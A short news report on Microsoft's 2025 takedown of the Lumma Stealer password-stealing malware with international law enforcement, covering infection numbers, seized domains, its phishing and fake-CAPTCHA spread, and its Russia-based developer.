Microsoft announced (via CNBC) the successful shutdown of the Lumma Stealer malware (MSD), which infected over 394,000 Windows computers worldwide between March 16 and May 16, 2025. This operation was conducted in cooperation with law enforcement agencies in the United States, Europe, and Japan.
Lumma Stealer is a malware that has been used by cybercriminals to steal passwords, banking information, credit cards, and cryptocurrency wallets. In one example, the thefts were made through fake emails from popular sites such as Booking.com.
Example of a phishing email impersonating Booking.com
Microsoft
Microsoft said it had blocked or removed approximately 2,300 malicious domains that were the backbone of Lumma’s infrastructure. In addition, more than 1,300 domains were seized and transferred to Microsoft by law enforcement agencies. The company also blocked online marketplaces where the software was sold. Microsoft said hackers had been buying Lumma malware through underground online forums since at least 2022, while developers were constantly improving its capabilities.
The operation, supported by the US Department of Justice, Europol and the Japan Cybercrime Center, resulted in the malware being disconnected from its victims and 300 domains were redirected to dedicated Microsoft servers for monitoring and user protection.
The Lumma Stealer virus spread through phishing attacks, malicious advertising, and fake CAPTCHAs. Microsoft said that hackers often used Lumma to attack online gaming communities and educational systems. Several other cybersecurity companies noted that the malware was also used in cyberattacks targeting manufacturing, logistics, healthcare, and other related critical infrastructure.
Microsoft added that Lumma's main developer is based in Russia and goes by the online alias "Shamel." Shamel offers various levels of service for Lumma via Telegram and other Russian-language chat rooms.